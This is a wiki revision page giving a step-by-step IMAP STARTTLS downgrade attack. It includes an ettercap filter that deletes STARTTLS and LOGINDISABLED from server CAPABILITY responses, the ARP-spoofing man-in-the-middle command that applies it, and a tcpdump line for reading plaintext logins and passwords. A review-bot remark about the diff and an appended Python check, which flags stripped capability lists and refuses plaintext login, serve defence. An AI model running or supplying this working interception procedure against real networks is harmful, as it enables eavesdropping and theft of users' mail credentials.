STARTTLS DOWNGRADE STARTTLS Removal: Difference between revisions
| Zeile 8: | Zeile 8: | ||
<pre> | <pre> | ||
if (ip.proto == TCP && tcp.src == 143) { | if (ip.proto == TCP && tcp.src == 143) { | ||
| − | if (search(DATA.data, "CAPABILITY")) { | + | if (search(DATA.data, "CAPABILITY")) { |
| − | if (search(DATA.data, "STARTTLS")) { replace("STARTTLS", " "); } | + | if (search(DATA.data, "STARTTLS")) { replace("STARTTLS", " "); } |
| − | if (search(DATA.data, "LOGINDISABLED")) { replace("LOGINDISABLED", " "); } | + | if (search(DATA.data, "LOGINDISABLED")) { replace("LOGINDISABLED", " "); } |
| − | } | + | } |
} | } | ||
| + | |||
</pre> | </pre> | ||
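Review bot: the removed and added versions of the four filter lines in this hunk read identically as rendered, so the change appears to be whitespace only, and the edit summary should say so. The one visible difference is the empty line added just before `</pre>`, which ends up as a trailing blank line in the rendered code block and can be dropped.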
Current revision as of 10 August 2025, 20:27
Required package
- apt-get install ettercap-graphical
- CLIENT=10.0.10.55
- GATEWAY=10.0.10.1
- INTERFACE=eth0
Create the filter file
- vi imapstrip.ef
# Server-to-client IMAP traffic (TCP source port 143)
if (ip.proto == TCP && tcp.src == 143) {
    # Only act on packets carrying the CAPABILITY list
    if (search(DATA.data, "CAPABILITY")) {
        if (search(DATA.data, "STARTTLS")) { replace("STARTTLS", " "); }
        if (search(DATA.data, "LOGINDISABLED")) { replace("LOGINDISABLED", " "); }
    }
}
Compile the filter
- etterfilter imapstrip.ef -o imapstrip.efec
Start the MITM (ARP proxy with filter)
- ettercap -Tq -i $INTERFACE -M arp "/$CLIENT//" "/$GATEWAY//" -F imapstrip.efec
Proof (plaintext visible)
- tcpdump -ni $INTERFACE -A -s0 host $CLIENT and port 143 | egrep -i 'capability|starttls|login|pass'
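The defensive counterpart to the procedure above, as an added example that is not part of the original wiki page: a strict client policy that never sends credentials outside TLS, plus a check that flags a CAPABILITY list that looks edited in transit. The function names `assess` and `next_step`, the finding labels and the sample lines are assumptions constructed for this illustration.

```python
import re

# Matches "* CAPABILITY ..." and the greeting form "* OK [CAPABILITY ...]".
CAP_RE = re.compile(r"^\* (?:OK \[)?CAPABILITY ([^\]\r\n]*)", re.IGNORECASE)

def assess(line, tls_active=False):
    """Return (tokens, findings) for one server line seen on port 143."""
    m = CAP_RE.match(line)
    if m is None:
        return [], ["not-a-capability-response"]
    raw = m.group(1)
    tokens = [t.upper() for t in raw.split()]
    findings = []
    if not tls_active and "STARTTLS" not in tokens:
        findings.append("starttls-not-advertised")
    if not tls_active and "LOGINDISABLED" not in tokens:
        findings.append("plaintext-login-permitted")
    # RFC 3501 separates capabilities with exactly one space, so runs of
    # spaces or a trailing space suggest the list was edited in transit.
    if re.search(r"  | $", raw):
        findings.append("irregular-spacing")
    return tokens, findings

def next_step(line, tls_active=False):
    """Strict client policy: credentials are only ever sent inside TLS."""
    tokens, _ = assess(line, tls_active)
    if tls_active:
        return "AUTHENTICATE"
    return "STARTTLS" if "STARTTLS" in tokens else "ABORT"

# Constructed sample data (not captured traffic): the second line is what a
# client sees when both tokens have been replaced by a single space.
CLEAN = "* CAPABILITY IMAP4rev1 STARTTLS LOGINDISABLED\r\n"
STRIPPED = CLEAN.replace("STARTTLS", " ").replace("LOGINDISABLED", " ")

if __name__ == "__main__":
    for name, line in (("clean", CLEAN), ("stripped", STRIPPED)):
        print(name, assess(line)[1], "->", next_step(line))
```

A client that aborts when STARTTLS is missing, or that uses implicit TLS on port 993, gives the modified CAPABILITY response nothing to downgrade.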